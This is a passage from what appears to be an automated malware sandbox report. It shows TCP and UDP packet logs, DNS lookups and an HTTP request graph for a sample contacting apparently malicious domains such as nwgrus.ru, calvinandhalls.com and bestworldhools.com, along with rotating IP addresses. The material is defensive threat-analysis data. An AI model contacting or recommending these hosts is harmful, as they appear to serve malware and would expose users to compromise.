                                        Oct 7, 2024 15:01:32.311333895 CEST44350017188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:32.311348915 CEST50017443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:32.311355114 CEST44350017188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:32.339948893 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:32.340001106 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:32.340073109 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:32.340393066 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:32.340409994 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.045044899 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.045144081 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.046456099 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.046463966 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.046710014 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.047821045 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.047875881 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.047879934 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325364113 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325716019 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325716972 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325875998 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325911045 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325939894 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325965881 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:44.403997898 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.408998013 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:44.409090996 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.417134047 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.417171001 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.421916962 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:44.422120094 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179423094 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179444075 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179544926 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.179680109 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179713964 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.179781914 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.180727959 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.180798054 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.181176901 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.181220055 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.188357115 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:54.292563915 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.292601109 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.292701006 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.293205023 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.293215036 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.994376898 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.994525909 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.996342897 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.996362925 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.996635914 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.998280048 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.998280048 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.998356104 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268094063 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268189907 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.282983065 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283027887 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.283128023 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283466101 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283478022 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.758223057 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.758233070 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.922323942 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.922533989 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.204224110 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.204247952 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.204587936 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.212061882 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.212061882 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.212075949 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460171938 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460396051 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.460542917 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460553885 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.460602999 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460648060 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:06.903160095 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908070087 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:06.908157110 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908350945 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908404112 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.914069891 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:06.914134979 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.858335972 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.859997988 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.860198021 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:07.860198021 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:07.865235090 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:16.093089104 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093158007 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.093223095 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093559027 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093584061 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.717792988 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.717869997 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.719166994 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.719197989 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.719466925 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.720180988 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.720215082 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.720228910 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024153948 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024265051 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024349928 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024466991 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024492025 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024516106 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024523973 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.061141968 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061194897 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.061279058 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061609030 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061621904 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.690265894 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.690362930 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.692949057 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.692964077 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.693279982 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.696377039 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.696403027 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.696471930 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001768112 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001867056 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001970053 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002043962 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002060890 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.002074003 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002079010 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:28.921040058 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.925982952 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:28.926074982 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.926256895 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.926287889 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.931164980 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:28.931340933 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863377094 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863687992 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863734007 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:29.864065886 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:29.868839025 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:38.573918104 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.573961973 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:38.574057102 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.574450016 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.574469090 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.762859106 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.762986898 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.764388084 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.764408112 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.764704943 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.765578985 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.765629053 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.765636921 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.046683073 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.046945095 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.046992064 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.047135115 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.047185898 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.047199965 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.047245026 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.132939100 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133037090 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.133132935 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133444071 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133475065 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.757666111 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.757751942 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.759046078 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.759076118 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.759371996 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.760067940 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.760117054 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.760126114 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069097996 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069179058 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069281101 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069408894 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069457054 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069489002 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069505930 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:49.995513916 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000469923 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.000559092 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000724077 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000741959 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.005556107 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.005572081 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926397085 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926558971 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926728964 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.929590940 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.934519053 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:03:01.935972929 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936017990 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:01.936088085 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936686039 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936702013 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.553555965 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.553684950 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.554976940 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.554987907 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.555284023 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.556086063 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.556116104 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.556121111 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864384890 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864458084 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864510059 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864561081 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864576101 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864590883 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864597082 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.905472040 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905515909 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.905594110 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905965090 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905980110 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.519984007 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.520106077 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.521672964 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.521682978 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.521944046 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.522764921 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.522803068 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.522806883 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824243069 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824323893 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824378967 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824424982 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824445963 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824461937 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824471951 CEST44350030188.40.141.211192.168.2.5

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 14:59:20.448164940 CEST5630453192.168.2.51.1.1.1
                                        Oct 7, 2024 14:59:21.439896107 CEST5630453192.168.2.51.1.1.1
                                        Oct 7, 2024 14:59:22.466022968 CEST5630453192.168.2.51.1.1.1
                                        Oct 7, 2024 14:59:22.772443056 CEST53563041.1.1.1192.168.2.5
                                        Oct 7, 2024 14:59:22.772464991 CEST53563041.1.1.1192.168.2.5
                                        Oct 7, 2024 14:59:22.772475004 CEST53563041.1.1.1192.168.2.5
                                        Oct 7, 2024 15:00:12.271975994 CEST5626453192.168.2.51.1.1.1
                                        Oct 7, 2024 15:00:13.284019947 CEST5626453192.168.2.51.1.1.1
                                        Oct 7, 2024 15:00:13.689789057 CEST53562641.1.1.1192.168.2.5
                                        Oct 7, 2024 15:00:13.689802885 CEST53562641.1.1.1192.168.2.5
                                        Oct 7, 2024 15:00:14.723191023 CEST6417653192.168.2.51.1.1.1
                                        Oct 7, 2024 15:00:15.154860020 CEST53641761.1.1.1192.168.2.5
                                        Oct 7, 2024 15:02:06.517864943 CEST6415053192.168.2.51.1.1.1
                                        Oct 7, 2024 15:02:06.879978895 CEST53641501.1.1.1192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 7, 2024 14:59:20.448164940 CEST192.168.2.51.1.1.10x53f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:21.439896107 CEST192.168.2.51.1.1.10x53f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.466022968 CEST192.168.2.51.1.1.10x53f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:12.271975994 CEST192.168.2.51.1.1.10xb5b1Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:13.284019947 CEST192.168.2.51.1.1.10xb5b1Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:14.723191023 CEST192.168.2.51.1.1.10x7d20Standard query (0)bestworldhools.comA (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.517864943 CEST192.168.2.51.1.1.10x5189Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772443056 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772464991 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                        Oct 7, 2024 14:59:22.772475004 CEST1.1.1.1192.168.2.50x53f4No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:13.689789057 CEST1.1.1.1192.168.2.50xb5b1No error (0)calvinandhalls.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:13.689802885 CEST1.1.1.1192.168.2.50xb5b1No error (0)calvinandhalls.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:15.154860020 CEST1.1.1.1192.168.2.50x7d20No error (0)bestworldhools.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru201.229.130.162A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • 23.145.40.164
                                        • https:
                                          • calvinandhalls.com
                                          • bestworldhools.com
                                        • bmrvdxbbdeon.com
                                          • nwgrus.ru
                                        • hkxxphsdfyiakovt.org
                                        • hgegifhrmen.com
                                        • jqmiciumjrg.org
